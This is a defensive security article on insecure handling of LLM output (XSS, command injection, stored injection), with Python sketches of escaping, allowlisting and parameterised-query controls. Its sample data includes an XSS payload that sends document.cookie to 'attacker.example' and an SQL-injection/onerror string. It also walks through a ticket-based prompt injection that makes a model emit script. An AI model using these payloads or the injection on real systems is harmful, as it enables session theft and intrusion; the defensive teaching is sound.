
Insecure output handling — the LLM risk teams underrate

Teams spend significant effort hardening the input to an LLM and very little hardening what the LLM outputs. Insecure output handling is how prompt injection becomes code execution, data exfiltration, or stored injection.

Drel Research · 11 min read

Most LLM security effort concentrates on the input side: filtering user prompts, blocking injection attempts, adding guardrails to the model. The output side receives far less attention. In assessed systems, we consistently find that LLM output reaches HTML renderers, shell commands, database write paths, and downstream APIs without the same validation discipline applied to any other untrusted input.

The result is that prompt injection becomes consequential not because the injection itself causes harm, but because the injected output is then consumed unsafely. Hardening input without hardening output is solving the wrong problem. See also the OWASP LLM Top 10 Assessment for how this risk fits into the broader framework.

What insecure output handling is

Insecure output handling (LLM02 in the 2023 OWASP Top 10 for LLM Applications; the 2025 edition lists it as LLM05, Improper Output Handling) is the condition where the application consumes LLM-generated text as though it were trusted data. That text is not trustworthy: the model is a probabilistic system that can produce any text its training and prompt lead it toward, including text that would be harmful if consumed literally by downstream systems.

This article focuses on three distinct failure modes, each with its own damage class:

  • Rendering LLM output as HTML — enables cross-site scripting (XSS) if the output contains script tags or event handler attributes.
  • Passing LLM output to shell commands — enables command injection if the output contains shell metacharacters.
  • Storing LLM output in a database without sanitisation — enables stored injection attacks on future consumers of that stored content.

All three share the same root cause: the application trusts the LLM's output the same way it would trust data from its own system, rather than treating it as untrusted input from an external source that must be validated before use.

Output validation — risk and control by output type

| Output type | Risk if unvalidated | Validation control |
|---|---|---|
| Rendered HTML / markdown | XSS if script tags, event-handler attributes, or javascript: / data: URIs are present in the output | Sanitise with DOMPurify or an equivalent library before rendering; never pass unsanitised output to dangerouslySetInnerHTML |
| Code executed in the environment | Arbitrary code execution with the application's privileges; command injection if shell metacharacters reach an exec call | Sandbox execution; allowlist permitted commands; never pass output directly to a shell |
| SQL / command interpolation | SQL injection or command injection if output is interpolated into queries or command strings | Parameterised queries for all DB writes; argument vectors (not shell strings) or strict escaping for all exec paths |
| Downstream API call payload | Unintended API calls with attacker-controlled parameters | Schema-validate output before dispatch; allowlist permitted API targets and methods |
| User-facing text with financial / legal implications | Incorrect or fabricated statements presented as authoritative | Human review gate for high-consequence outputs; disclaimers; scope-limit the model task |
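For the last row, a human review gate can be keyed on the kind of task the model was asked to perform rather than on the text it produced, because that text may itself be attacker-influenced. A minimal Python sketch, assuming hypothetical task category names; a real deployment would define these from its own scope of high-consequence tasks.

```python
from dataclasses import dataclass

# Hypothetical task categories whose outputs carry financial or legal consequence.
HIGH_CONSEQUENCE_TASKS = frozenset({"refund_decision", "contract_summary", "pricing_quote"})


@dataclass
class Disposition:
    action: str  # "publish" or "hold_for_review"
    text: str


def route_output(task_type: str, model_text: str) -> Disposition:
    """Hold high-consequence outputs for a human reviewer before release.

    Routing depends only on the task type, never on the output content,
    so injected text cannot talk its way past the gate.
    """
    if task_type in HIGH_CONSEQUENCE_TASKS:
        return Disposition("hold_for_review", model_text)
    return Disposition("publish", model_text)
```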

How injection becomes execution

The connection between prompt injection and insecure output handling is direct. Prompt injection provides the mechanism to produce adversarial output. Insecure output handling is what makes that adversarial output consequential.

Consider a customer support application that summarises user-submitted tickets and renders those summaries in an admin dashboard as HTML. An attacker submits a support ticket containing injection instructions that cause the LLM to include a script tag in its summary. If the dashboard renders the summary as raw HTML, the script executes in the browser context of every administrator who views the ticket. The XSS payload is delivered through the model, not through a direct input.
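When the dashboard only needs to show the summary as text, encoding it for HTML is sufficient and simpler than sanitising. A minimal Python sketch, assuming a server-side fragment built with f-strings; the function name and markup are hypothetical. If the summary must render as rich markdown, a sanitiser such as DOMPurify is the appropriate control instead.

```python
import html


def render_ticket_summary(ticket_id: int, summary: str) -> str:
    """Render an LLM-written ticket summary into an admin dashboard fragment.

    The summary is treated as untrusted text: html.escape converts <, >, &
    and quotes into entities, so an injected <script> tag is displayed as
    text instead of being executed in the administrator's browser.
    """
    return (
        f'<div class="ticket-summary" data-ticket="{ticket_id}">'
        f"<p>{html.escape(summary, quote=True)}</p>"
        "</div>"
    )


# A summary the model produced after reading an injected ticket.
malicious = 'Customer wants a refund.<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
print(render_ticket_summary(42, malicious))
```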

The same chain works for command injection. An application that generates shell commands from natural language user requests and executes them — without sanitising the generated command — is exploitable through any injection technique that causes the model to include shell metacharacters in its output.
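The chain depends on a shell parsing a string that contains model output. A minimal Python sketch of the alternative, assuming a hypothetical search feature that runs grep with a model-supplied pattern: the output becomes a single element of an argument vector, and subprocess.run is called without shell=True, so no shell ever interprets it.

```python
import subprocess


def build_search_argv(pattern: str, path: str) -> list[str]:
    """Build an argument vector for a search command from model output.

    The model-supplied pattern is exactly one argv element. Because the list
    is executed without a shell, ;, |, & and $(...) are literal characters,
    not command separators. "--" stops grep from reading a pattern that
    starts with "-" as an option.
    """
    return ["grep", "--", pattern, path]


def run_search(pattern: str, path: str) -> subprocess.CompletedProcess:
    # Vulnerable alternative, shown for contrast only (do not use):
    #   subprocess.run(f"grep {pattern} {path}", shell=True)
    return subprocess.run(
        build_search_argv(pattern, path), capture_output=True, text=True, check=False
    )
```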

The LLM is the delivery mechanism. Insecure output handling is what makes delivery matter. A model that produces adversarial output but whose output is always validated before use cannot cause harm through its output channel — regardless of how sophisticated the injection was.

The three failure modes

Each failure mode has distinct characteristics that affect how controls must be applied.

Failure mode 1 — rendering output as HTML

Any application that renders LLM output in a browser context without escaping it is vulnerable to XSS. The attack requires the model to include a script tag, an event handler attribute, or a javascript: or data: URI in its output. Direct injection, where the user types the payload, is an obvious attack path. Indirect injection, where a retrieved document contains the payload and the model reproduces it in its summary, is a subtler path that many input filters miss.
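Links are an easy path to miss, because a markdown link such as [docs](javascript:...) contains no script tag. In a browser, DOMPurify handles this; for server-side rendering, one piece of the logic is a scheme allowlist applied to every URL taken from model output. A minimal Python sketch, assuming an allowlist of http, https and mailto; relative URLs are rejected too, which may be stricter than an application needs.

```python
from typing import Optional
from urllib.parse import urlsplit

# Schemes permitted in links taken from model output; everything else is dropped.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})


def safe_link_href(raw_url: str) -> Optional[str]:
    """Return the URL if its scheme is allowlisted, otherwise None.

    Blocks javascript: and data: URIs that a model might reproduce from a
    poisoned document. Non-printable characters (tabs, newlines) are removed
    first because browsers ignore them when parsing a scheme, which would
    otherwise let "java\\tscript:" slip through. The result must still be
    attribute-escaped when it is written into an href.
    """
    cleaned = "".join(ch for ch in raw_url if ch.isprintable()).strip()
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:  # e.g. a malformed IPv6 host
        return None
    return cleaned if scheme in ALLOWED_SCHEMES else None
```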

The damage class of XSS through LLM output is the same as XSS through any other output channel: session hijacking, credential theft, account takeover, malicious redirects. In admin-facing applications, the blast radius is particularly high because the victims are users with elevated privilege.

Failure mode 2 — passing output to shell commands

Applications that use an LLM to generate commands for execution (shell scripts, system calls, CLI tool invocations) and pass those commands directly to a shell or exec function are vulnerable to command injection. The attacker causes the model to include shell metacharacters such as ;, |, &, backticks, or $(...) in its output, which the executing context interprets as command separators or substitutions.
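When an application genuinely needs to run model-proposed commands, one defensive pattern is to reject shell metacharacters outright, parse the proposal into an argument vector, and check the program and subcommand against an allowlist before anything runs. A sketch in Python, assuming a hypothetical allowlist of read-only git subcommands plus ls. It does not constrain flags: some flags have side effects (git diff's --output writes to a file, for example), so a production allowlist would restrict options too, and execution should still happen in a sandbox.

```python
import shlex

# Hypothetical allowlist: program -> permitted first argument (empty set = any arguments).
ALLOWED_COMMANDS: dict[str, set[str]] = {
    "git": {"status", "log", "diff"},
    "ls": set(),
}

# Characters with special meaning to a shell. Rejecting them is stricter than
# needed when no shell is involved, but it makes the intent unambiguous.
SHELL_METACHARACTERS = set(";|&$`<>(){}*?!\n\r")


class CommandRejected(ValueError):
    pass


def validate_model_command(command: str) -> list[str]:
    """Parse a model-proposed command line into argv, or raise CommandRejected."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        raise CommandRejected("shell metacharacter in model output")
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # e.g. unbalanced quotes
        raise CommandRejected(str(exc)) from exc
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise CommandRejected(f"program not allowlisted: {argv[:1]}")
    subcommands = ALLOWED_COMMANDS[argv[0]]
    if subcommands and (len(argv) < 2 or argv[1] not in subcommands):
        raise CommandRejected("subcommand not allowlisted")
    # Pass the result to subprocess.run(argv) without shell=True, inside a sandbox.
    return argv
```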

This failure mode is more common in agentic systems, where the model's tool manifest includes shell execution capabilities, than in chat applications. But it also appears in developer tools, code generation assistants, and data pipeline automation that use LLMs to construct command strings from natural language.

Failure mode 3 — storing output without sanitisation

When LLM output is stored in a database without sanitisation and later retrieved and rendered, the stored content becomes a vector for future attacks on users who access that stored data. This is the stored injection equivalent of the HTML rendering failure mode, with the additional property that the attack persists across sessions and affects users who had no interaction with the original injection.
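A minimal sketch of the storage-side controls using Python's built-in sqlite3 module: the write uses a parameterised query, and the retrieval path HTML-encodes the stored text every time it is rendered. The table and function names are hypothetical. The sketch stores the model's text verbatim and encodes on output; sanitising before storage is a complementary control for columns that are rendered as HTML, not a replacement for encoding on retrieval.

```python
import html
import sqlite3


def store_response(conn: sqlite3.Connection, ticket_id: int, llm_text: str) -> None:
    # Parameterised query: the driver binds llm_text as data, so quotes or SQL
    # fragments in the model output cannot change the statement.
    conn.execute(
        "INSERT INTO responses (ticket_id, body) VALUES (?, ?)",
        (ticket_id, llm_text),
    )
    conn.commit()


def render_stored_response(conn: sqlite3.Connection, ticket_id: int) -> str:
    row = conn.execute(
        "SELECT body FROM responses WHERE ticket_id = ?", (ticket_id,)
    ).fetchone()
    if row is None:
        return ""
    # Stored content is still untrusted: encode at render time, every time.
    return f"<p>{html.escape(row[0])}</p>"


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE responses (ticket_id INTEGER, body TEXT)")
payload = "Resolved'); DROP TABLE responses;-- <img src=x onerror=alert(1)>"
store_response(conn, 7, payload)
print(render_stored_response(conn, 7))
```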

Knowledge bases that ingest LLM-generated content, helpdesk systems that store LLM-written responses, and document management systems with AI-assisted drafting are all potentially affected by this failure mode.

The downstream trust problem

Insecure output handling is a manifestation of a broader problem: the assumption that because the model is a trusted component of the system, its output is trusted data. This assumption is incorrect.

The LLM is trusted in the sense that the operator controls which model is used. But the model's output is determined by its training and its input — and the input includes content from untrusted sources: user messages, retrieved documents, tool responses. If any of those sources is adversarially controlled, the model's output may be adversarially controlled regardless of how trusted the model itself is.

The correct mental model is: LLM output is produced by a trusted process consuming untrusted inputs. Its trust level is therefore bounded by its inputs. Any downstream system that consumes the output must treat it as untrusted data whose trust level cannot be higher than the least-trusted input the model received.
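The bounding rule amounts to taking a minimum over the trust levels of everything in the model's context. A sketch in Python, assuming a hypothetical four-level scale; the level names and ordering are illustrative and not drawn from any standard.

```python
from enum import IntEnum


class Trust(IntEnum):
    # Higher value = more trusted. Illustrative levels only.
    ATTACKER_CONTROLLABLE = 0  # public web pages, inbound email, user uploads
    AUTHENTICATED_USER = 1     # messages from signed-in users
    INTERNAL_CURATED = 2       # reviewed internal knowledge-base articles
    OPERATOR = 3               # system prompt written by the operator


def output_trust(input_trust_levels: list[Trust]) -> Trust:
    """Model output is no more trusted than the least-trusted input in its context."""
    if not input_trust_levels:
        raise ValueError("a model call always has at least one input")
    return min(input_trust_levels)


# System prompt + user message + one retrieved public web page:
ctx = [Trust.OPERATOR, Trust.AUTHENTICATED_USER, Trust.ATTACKER_CONTROLLABLE]
print(output_trust(ctx).name)  # ATTACKER_CONTROLLABLE
```

A single retrieved public page is enough to pull the whole output down to the lowest level, which is why every downstream sink has to treat it as untrusted.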

Controls at each layer

Controls for insecure output handling operate at four layers: rendering, execution, storage, and outbound API calls. Controls at each layer are independent: a control at the rendering layer does not protect the execution layer.

| Layer | Control | Evidence |
|---|---|---|
| HTML rendering | LLM output passed through a sanitisation library (e.g. DOMPurify) before rendering; no dangerouslySetInnerHTML with unsanitised output; markdown-to-HTML libraries configured to strip scripts | Code review of all render paths for LLM output; XSS test with a script tag in the output |
| Shell execution | Commands generated by the model are not passed directly to shell exec; arguments are validated and escaped before use; sandbox or allowlist restricts which commands are permitted | Code review of all exec paths; command injection test with shell metacharacters in the output |
| Database storage | LLM output stored using parameterised queries; sanitisation applied before storage in columns used for HTML rendering; stored content treated as untrusted when retrieved | Parameterised query usage confirmed; stored injection test: output with an XSS payload is stored and retrieved and does not execute |
| API calls | LLM-generated content used as API request bodies or parameters is schema-validated before dispatch; external API calls from LLM output require explicit allowlisting | Schema validation implementation; allowlist configuration and enforcement test |
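A sketch of the API-call row using only the Python standard library: the model's JSON is parsed, checked against a fixed shape, and mapped onto an allowlisted action. The action names, endpoints (example domains) and parameter schemas are hypothetical. The design choice is that the model supplies only an action name and parameter values; the HTTP method and URL come from the allowlist, so output cannot redirect the call to another host.

```python
import json
from dataclasses import dataclass

# Hypothetical allowlist: action -> (HTTP method, fixed endpoint, parameter schema).
ALLOWED_ACTIONS = {
    "create_ticket": ("POST", "https://helpdesk.internal.example/api/tickets",
                      {"title": str, "priority": int}),
    "get_order": ("GET", "https://orders.internal.example/api/orders",
                  {"order_id": str}),
}


@dataclass(frozen=True)
class ApiCall:
    method: str
    url: str
    params: dict


class InvalidModelCall(ValueError):
    pass


def parse_model_call(model_output: str) -> ApiCall:
    """Validate model-proposed JSON before any request is dispatched."""
    try:
        data = json.loads(model_output)
    except json.JSONDecodeError as exc:
        raise InvalidModelCall("output is not JSON") from exc
    if not isinstance(data, dict) or set(data) != {"action", "params"}:
        raise InvalidModelCall("unexpected top-level shape")
    action, params = data["action"], data["params"]
    if not isinstance(action, str) or action not in ALLOWED_ACTIONS:
        raise InvalidModelCall(f"action not allowlisted: {action!r}")
    method, url, schema = ALLOWED_ACTIONS[action]
    # Exact key match: extra keys (such as an injected "url") are rejected.
    if not isinstance(params, dict) or set(params) != set(schema):
        raise InvalidModelCall("parameters do not match schema")
    for name, expected_type in schema.items():
        value = params[name]
        # bool is a subclass of int in Python, so reject it explicitly.
        if not isinstance(value, expected_type) or isinstance(value, bool):
            raise InvalidModelCall(f"{name} must be {expected_type.__name__}")
    return ApiCall(method, url, params)
```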

What a review must verify

A security review that addresses insecure output handling must map every path where LLM output is consumed by the application and verify that each path treats the output as untrusted data. The review must produce:

  • A map of output consumption points: which components receive LLM output and in what form.
  • For HTML rendering paths: evidence that sanitisation is applied before output reaches any HTML render context.
  • For shell execution paths: evidence that output is not passed directly to a shell exec function; argument validation is in place.
  • For database storage paths: evidence that parameterised queries are used and that stored LLM content is treated as untrusted on retrieval.
  • Test results covering each failure mode: XSS attempt, command injection attempt, stored injection attempt.

The OWASP LLM Top 10 Assessment structures this review against all ten OWASP risks and produces an evidence pack suitable for AI Committee review.


Review your LLM output handling

Drel maps the output consumption paths in assessed systems, identifies insecure handling at each layer, and produces evidence that the AI Committee needs to make a clearance decision.

A note on scope: Drel reviews assessed systems against documented architecture, configuration and intent. It does not ingest live telemetry from production environments. Dispositions reflect the assessed system at the time of review and the re-assessment triggers that govern when the disposition must be revisited.